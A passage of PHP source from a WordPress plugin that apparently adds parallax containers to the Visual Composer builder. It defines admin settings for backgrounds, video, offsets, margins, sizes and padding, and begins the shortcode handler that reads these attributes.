													array(
														'admin_label' 	=> true,
														'type' 			=> 'attach_image',
														'heading' 		=> __('Background Images', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_img',
														'group'			=> $group_background_settings,
													),													
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Background Repeat', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_repeat',
														'description' 	=> __(	'The <code>background-repeat</code> property sets if/how a background image will be repeated.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_background-repeat.asp">Example</a>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('No Repeat', 'Parallax-Engine-VC') 				=> 'no-repeat',
																			__('Repeat All', 'Parallax-Engine-VC') 			=> 'repeat',
																			__('Repeat Horizontally', 'Parallax-Engine-VC') 	=> 'repeat-x',
																			__('Repeat Vertically', 'Parallax-Engine-VC') 		=> 'repeat-y',																		
																		),																		
														'group'			=> $group_background_settings,				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_desktop',
														'description'	=> __(	'The <code>background-size</code> property specifies the size of the background images.
																				<a target="_blank" href="http://www.w3schools.com/cssref/css3_pr_background-size.asp">Example</a><br>
																				<strong>Ext:</strong> <code>auto</code>, <code>cover</code>, <code>contain</code> 
																				or <code>100px 100px</code>, <code>100% 100%</code>, <code>50%</code> ...<br>
																				If blank, defaults to <code>cover</code>', 'Parallax-Engine-VC'),	
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_small_desktop',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_tablet',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_small_tablet',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_mobile',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Background Size (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bs_small_mobile',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),	
														'group'			=> $group_background_settings,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Background Position', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_position',
														'description' 	=> __(	'The <code>background-position</code> property sets the starting position of a background image. 
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_background-position.asp">Example</a>', 'Parallax-Engine-VC'),
														'value' 		=> array(
																			__('Center Center', 'Parallax-Engine-VC') 				=> 'center center',
																			__('Center Top', 'Parallax-Engine-VC') 				=> 'center top',
																			__('Center Bottom', 'Parallax-Engine-VC') 				=> 'center bottom',
																			__('Left Top', 'Parallax-Engine-VC') 					=> 'left top',
																			__('Left Center', 'Parallax-Engine-VC') 				=> 'left center',
																			__('Left Bottom', 'Parallax-Engine-VC') 				=> 'left bottom',																			
																			__('Right Top', 'Parallax-Engine-VC') 					=> 'right top',
																			__('Right Center', 'Parallax-Engine-VC') 				=> 'right center',
																			__('Right Bottom', 'Parallax-Engine-VC') 				=> 'right bottom',
																			__('Custom Background Postion', 'Parallax-Engine-VC') 	=> 'custom',																	
																		),
														'group'			=> $group_background_settings,				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_desktop',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, defaults to <code>center center</code>', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_small_desktop',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_tablet',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_small_tablet',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_mobile',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Background Postion (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'cbp_small_mobile',
														'description' 	=> __(	'<strong>Ext:</strong> <code>center center</code>, <code>center top</code>, <code>center bottom</code>, <code>left top</code>, 
																				<code>left center</code>, <code>left bottom</code>, <code>right top</code>, <code>right center</code>, <code>right bottom</code>, 
																				<code>320px 320px</code>, <code>240px 240px</code> ...<br>
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'dependency' 	=> 	array(
																				'element' 	=> 'background_position',
																				'value'		=> array('custom'),
																			),
														'group'			=> $group_background_settings,					
													),	
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('z-index (number, not required, may be empty)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'z_index',
														'description' 	=> __(	'The <code>z-index</code> property specifies the stack order of an element.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_z-index.asp">Example</a>', 'Parallax-Engine-VC'),														
														'group'			=> $group_background_settings,					
													),	
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Background Video Options', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bg_video_options',
														'value' 		=> array(
																			__('No Background Video', 'Parallax-Engine-VC') => '0',
																			__('Youtube Video Background', 'Parallax-Engine-VC') => '1',
																			__('HTML5 Video Background', 'Parallax-Engine-VC') => '2',																																				
																		),						
														'group'			=> $group_background_settings,
													),
													
													//youtube	
														array(
															'admin_label' 	=> true,
															'type' 			=> 'textfield',
															'heading' 		=> __('Youtube Video ID', 'Parallax-Engine-VC'),
															'param_name' 	=> 'youtube_id',
															'description' 	=> __(	'Paste "Video ID" of youtube into text box. <strong>Ext:</strong> <code>ab0TSkLe-E0</code>
																					<br><img src="'.BEETEAM368_PE_PLUGIN_URL.'assets/back-end/images/y-id.jpg">', 'Parallax-Engine-VC'),
															'dependency' 	=> array(
																					'element' 	=> 'bg_video_options',
																					'value'		=> array('1'),
																				),
															'group'			=> $group_background_settings,					
														),	
														array(
															'admin_label' 	=> true,
															'type' 			=> 'textfield',
															'heading' 		=> __('Start', 'Parallax-Engine-VC'),
															'param_name' 	=> 'start',
															'description' 	=> __('Starting Position in seconds. <strong>Ext:</strong> <code>3</code>, <code>5</code> ...', 'Parallax-Engine-VC'),	
															'dependency' 	=> array(
																					'element' 	=> 'bg_video_options',
																					'value'		=> array('1'),
																				),																		
															'group'			=> $group_background_settings,
														),
													//youtube
													
													//HTML5
														array(
															'admin_label' 	=> true,
															'type' 			=> 'textfield',
															'heading' 		=> __('Video Source (MP4)', 'Parallax-Engine-VC'),
															'param_name' 	=> 'mp4',
															'description' 	=> __('Enter your link Video (.mp4).', 'Parallax-Engine-VC'),	
															'dependency' 	=> array(
																					'element' 	=> 'bg_video_options',
																					'value'		=> array('2'),
																				),																		
															'group'			=> $group_background_settings,
														),
														array(
															'admin_label' 	=> true,
															'type' 			=> 'textfield',
															'heading' 		=> __('Video Source (WEBM)', 'Parallax-Engine-VC'),
															'param_name' 	=> 'webm',
															'description' 	=> __('Enter your link Video (.webm).', 'Parallax-Engine-VC'),	
															'dependency' 	=> array(
																					'element' 	=> 'bg_video_options',
																					'value'		=> array('2'),
																				),																		
															'group'			=> $group_background_settings,
														),
														array(
															'admin_label' 	=> true,
															'type' 			=> 'textfield',
															'heading' 		=> __('Video Source (OGV)', 'Parallax-Engine-VC'),
															'param_name' 	=> 'ogv',
															'description' 	=> __('Enter your link Video (.ogv).', 'Parallax-Engine-VC'),	
															'dependency' 	=> array(
																					'element' 	=> 'bg_video_options',
																					'value'		=> array('2'),
																				),																		
															'group'			=> $group_background_settings,
														),	
													//HTML5	
																				
													//background settings
													
													//Position
													array(
														'admin_label' 	=> true,
														'type' 			=> 'dropdown',
														'heading' 		=> __('Offset', 'Parallax-Engine-VC'),
														'param_name' 	=> 'position_settings',
														'value' 		=> array(
																			__('Default (top:-10%; right:-10%; bottom:-10%, left:-10%)', 'Parallax-Engine-VC') => 'default',																			
																			__('Custom Offset', 'Parallax-Engine-VC') 											=> 'custom',																	
																		),
														'group'			=> $group_position,				
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Top', 'Parallax-Engine-VC'),
														'param_name' 	=> 'top',
														'description'	=> __(	'Ext: <code>auto</code>, <code>0</code>, <code>10%</code>, <code>20%</code>, <code>100px</code>, 
																				<code>-100%</code>, <code>-200%</code>, <code>-20px</code> ... If blank, defaults to <code>auto</code>.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_top.asp">Example</a>', 'Parallax-Engine-VC'),
														'group'			=> $group_position,	
														'dependency' 	=> 	array(
																				'element' 	=> 'position_settings',
																				'value'		=> array('custom'),
																			),																	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Right', 'Parallax-Engine-VC'),
														'param_name' 	=> 'right',
														'description'	=> __(	'Ext: <code>auto</code>, <code>0</code>, <code>10%</code>, <code>20%</code>, <code>100px</code>, 
																				<code>-100%</code>, <code>-200%</code>, <code>-20px</code> ... If blank, defaults to <code>auto</code>.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_right.asp">Example</a>', 'Parallax-Engine-VC'),
														'group'			=> $group_position,	
														'dependency' 	=> 	array(
																				'element' 	=> 'position_settings',
																				'value'		=> array('custom'),
																			),																					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Bottom', 'Parallax-Engine-VC'),
														'param_name' 	=> 'bottom',
														'description'	=> __(	'Ext: <code>auto</code>, <code>0</code>, <code>10%</code>, <code>20%</code>, <code>100px</code>, 
																				<code>-100%</code>, <code>-200%</code>, <code>-20px</code> ... If blank, defaults to <code>auto</code>.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_bottom.asp">Example</a>', 'Parallax-Engine-VC'),
														'group'			=> $group_position,	
														'dependency' 	=> 	array(
																				'element' 	=> 'position_settings',
																				'value'		=> array('custom'),
																			),																					
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Left', 'Parallax-Engine-VC'),
														'param_name' 	=> 'left',
														'description'	=> __(	'Ext: <code>auto</code>, <code>0</code>, <code>10%</code>, <code>20%</code>, <code>100px</code>, 
																				<code>-100%</code>, <code>-200%</code>, <code>-20px</code> ... If blank, defaults to <code>auto</code>.
																				<a target="_blank" href="http://www.w3schools.com/cssref/pr_pos_left.asp">Example</a>', 'Parallax-Engine-VC'),
														'group'			=> $group_position,	
														'dependency' 	=> 	array(
																				'element' 	=> 'position_settings',
																				'value'		=> array('custom'),
																			),																					
													),
													//Position
													
													//Margin
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_desktop',
														'description'	=> __(	'[Margin:Top Right Bottom Left] - <strong>Ext:</strong> <code>auto auto auto auto</code>, <code>0 auto -60px auto</code>,
																				<code>0px 0px 0px 0px</code>, <code>-100px auto auto auto</code> ... If blank, defaults to <code>0</code>.
																				<a target="_blank" href="http://www.w3schools.com/css/css_margin.asp">Example</a>', 'Parallax-Engine-VC'),
														'group'			=> $group_margin,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_small_desktop',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),														
														'group'			=> $group_margin,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_tablet',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),														
														'group'			=> $group_margin,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_small_tablet',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),														
														'group'			=> $group_margin,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_mobile',
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),														
														'group'			=> $group_margin,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Custom Margin (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'margin_small_mobile',	
														'description'	=> __('If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),													
														'group'			=> $group_margin,																		
													),
													//Margin
													
													//Width
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_desktop',
														'description'	=> __('Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, defaults to <code>auto</code>.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_small_desktop',
														'description'	=> __(	'Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_tablet',
														'description'	=> __(	'Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_small_tablet',
														'description'	=> __(	'Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_mobile',
														'description'	=> __(	'Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Width (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'width_small_mobile',
														'description'	=> __(	'Ext: <code>100vw</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_width,																		
													),
													//Width
													
													//Height
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_desktop',
														'description'	=> __('Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, defaults to <code>auto</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Desktop)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_desktop',
														'description'	=> __(	'Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_tablet',
														'description'	=> __(	'Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Tablet)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_tablet',
														'description'	=> __(	'Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																		
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_mobile',
														'description'	=> __(	'Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Manually Set Height (Small Mobile)', 'Parallax-Engine-VC'),
														'param_name' 	=> 'height_small_mobile',
														'description'	=> __(	'Ext: <code>100vh</code>, <code>600px</code>, <code>560px</code>. If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_height,																		
													),
													//height	
													
													/*animation*/
													$animation_builder0,
													$animation_builder1,
													//$animation_builder2,
													$animation_builder3,
													$animation_builder4,
													$animation_builder5,
													$animation_builder6,
													$animation_builder7,
													$animation_builder8,
													/*animation*/																																				
												),
					)
				);
				
				vc_map(
					array(
						'name' 				=> 	__('Parallax Engine Content', 'Parallax-Engine-VC'),
						'base' 				=> 	'pe_content',
						'content_element' 	=> 	true,
						'is_container' 		=> 	true,					
						'js_view' 			=> 	'VcColumnView',
						'as_child' 			=> 	array('only' => 'pe_container'),
						'category' 			=>	$group_category,
						'icon'				=> 	BEETEAM368_PE_PLUGIN_URL.'assets/back-end/images/icon-vc-content.png',
						'params'			=> 	array(
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Desktop', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_desktop',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>150px 200px 150px 200px</code>.
																				If blank, defaults to <code>30px 30px 30px 30px</code>', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Small Desktop', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_small_desktop',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>100px 150px 100px 150px</code>.
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Tablet', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_tablet',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>80px 120px 80px 120px</code>.
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Small Tablet', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_small_tablet',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>60px 90px 60px 90px</code>.
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Mobile', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_mobile',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>40px 70px 40px 70px</code>.
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Padding On Small Mobile', 'Parallax-Engine-VC'),
														'param_name' 	=> 'padding_small_mobile',
														'description' 	=> __(	'Top Right Bottom Left. Ext: <code>20px 50px 20px 50px</code>.
																				If blank, it will inherit the properties located on it.', 'Parallax-Engine-VC'),
														'group'			=> $group_display_options,
													),
													array(
														'admin_label' 	=> true,
														'type'			=> 'colorpicker',
														'heading' 		=> __('Background Color', 'Parallax-Engine-VC'),
														'param_name' 	=> 'background_color',
														'group' 		=> $group_display_options,	
													),
													array(
														'admin_label' 	=> true,
														'type' 			=> 'textfield',
														'heading' 		=> __('Extra Class Name', 'Parallax-Engine-VC'),
														'param_name' 	=> 'extra_class',
														'group'			=> $group_display_options,
													),
													/*animation*/
													$animation_builder0,
													$animation_builder1,
													//$animation_builder2,
													$animation_builder3,
													$animation_builder4,
													$animation_builder5,
													$animation_builder6,
													$animation_builder7,
													$animation_builder8,
													/*animation*/	
												)
					)
				);
			}
			
		}		
		/*VC Builder*/
		
		/*Shortcode*/
			function pe_container_shortcode($params, $contents){
				extract(
					shortcode_atts(
						array(
							'relativeinput'				=>'', //1
							'cliprelativeinput'			=>'', //2
							'calibrate_x'				=>'', //3
							'calibrate_y'				=>'', //4
							'invert_x'					=>'', //5
							'invert_y'					=>'', //6							
							'limit_x'					=>'', //7
							'limit_y'					=>'', //8
							'calibrationthreshold'		=>'', //9
							'calibrationdelay'			=>'', //10
							'supportdelay'				=>'', //11
							'scalar_x'					=>'', //12
							'scalar_y'					=>'', //13
							'friction_x'				=>'', //14
							'friction_y'				=>'', //15
							'origin_x'					=>'', //16
							'origin_y'					=>'', //17							
							
							'height'					=>'', //18
							'height_percent'			=>'', //19
							'height_desktop'			=>'', //20
							'height_small_desktop'		=>'', //21
							'height_tablet'				=>'', //22
							'height_small_tablet'		=>'', //23
							'height_mobile'				=>'', //24
							'height_small_mobile'		=>'', //25
							'content_position'			=>'', //26
							'scroll_down'				=>'', //29	
							'background_color'			=>'', //27					
							'extra_class'				=>'', //28
						), 
						$params
					)
				);
				
				$rand_ID				= rand(1, 9999);
				$id                     = BEETEAM368_PE_PREFIX.$rand_ID;
				
				$relativeinput			= (isset($params['relativeinput'])&&trim($params['relativeinput'])!='')?trim($params['relativeinput']):'';
				$cliprelativeinput		= (isset($params['cliprelativeinput'])&&trim($params['cliprelativeinput'])!='')?trim($params['cliprelativeinput']):'';
				$calibrate_x			= (isset($params['calibrate_x'])&&trim($params['calibrate_x'])!='')?trim($params['calibrate_x']):'';
				$calibrate_y			= (isset($params['calibrate_y'])&&trim($params['calibrate_y'])!='')?trim($params['calibrate_y']):'';
				$invert_x				= (isset($params['invert_x'])&&trim($params['invert_x'])!='')?trim($params['invert_x']):'';
				$invert_y				= (isset($params['invert_y'])&&trim($params['invert_y'])!='')?trim($params['invert_y']):'';
				$limit_x				= (isset($params['limit_x'])&&trim($params['limit_x'])!=''&&is_numeric(trim($params['limit_x'])))?trim($params['limit_x']):'';
				$limit_y				= (isset($params['limit_y'])&&trim($params['limit_y'])!=''&&is_numeric(trim($params['limit_y'])))?trim($params['limit_y']):'';
				$calibrationthreshold	= (isset($params['calibrationthreshold'])&&trim($params['calibrationthreshold'])!=''&&is_numeric(trim($params['calibrationthreshold'])))?trim($params['calibrationthreshold']):'';
				$calibrationdelay		= (isset($params['calibrationdelay'])&&trim($params['calibrationdelay'])!=''&&is_numeric(trim($params['calibrationdelay'])))?trim($params['calibrationdelay']):'';
				$supportdelay			= (isset($params['supportdelay'])&&trim($params['supportdelay'])!=''&&is_numeric(trim($params['supportdelay'])))?trim($params['supportdelay']):'';
				$scalar_x				= (isset($params['scalar_x'])&&trim($params['scalar_x'])!=''&&is_numeric(trim($params['scalar_x'])))?trim($params['scalar_x']):'';
				$scalar_y				= (isset($params['scalar_y'])&&trim($params['scalar_y'])!=''&&is_numeric(trim($params['scalar_y'])))?trim($params['scalar_y']):'';
				$friction_x				= (isset($params['friction_x'])&&trim($params['friction_x'])!=''&&is_numeric(trim($params['friction_x'])))?trim($params['friction_x']):'';
				$friction_y				= (isset($params['friction_y'])&&trim($params['friction_y'])!=''&&is_numeric(trim($params['friction_y'])))?trim($params['friction_y']):'';
				$origin_x				= (isset($params['origin_x'])&&trim($params['origin_x'])!=''&&is_numeric(trim($params['origin_x'])))?trim($params['origin_x']):'';
				$origin_y				= (isset($params['origin_y'])&&trim($params['origin_y'])!=''&&is_numeric(trim($params['origin_y'])))?trim($params['origin_y']):'';
				
				$height					= (isset($params['height'])&&trim($params['height'])!=''&&is_numeric(trim($params['height'])))?trim($params['height']):'0';
				$height_percent			= (isset($params['height_percent'])&&trim($params['height_percent'])!='')?trim($params['height_percent']):'';
				$height_desktop			= (isset($params['height_desktop'])&&trim($params['height_desktop'])!='')?trim($params['height_desktop']):'';
				$height_small_desktop	= (isset($params['height_small_desktop'])&&trim($params['height_small_desktop'])!='')?trim($params['height_small_desktop']):'';
				$height_tablet			= (isset($params['height_tablet'])&&trim($params['height_tablet'])!='')?trim($params['height_tablet']):'';
				$height_small_tablet	= (isset($params['height_small_tablet'])&&trim($params['height_small_tablet'])!='')?trim($params['height_small_tablet']):'';
				$height_mobile			= (isset($params['height_mobile'])&&trim($params['height_mobile'])!='')?trim($params['height_mobile']):'';
				$height_small_mobile	= (isset($params['height_small_mobile'])&&trim($params['height_small_mobile'])!='')?trim($params['height_small_mobile']):'';
				$content_position		= (isset($params['content_position'])&&trim($params['content_position'])!=''&&is_numeric(trim($params['content_position'])))?$params['content_position']:'';
				$scroll_down			= (isset($params['scroll_down'])&&trim($params['scroll_down'])!=''&&is_numeric(trim($params['scroll_down'])))?$params['scroll_down']:'';
				$background_color		= (isset($params['background_color'])&&trim($params['background_color'])!='')?trim($params['background_color']):'';
				$extra_class			= (isset($params['extra_class'])&&trim($params['extra_class'])!='')?trim($params['extra_class']):'';
				
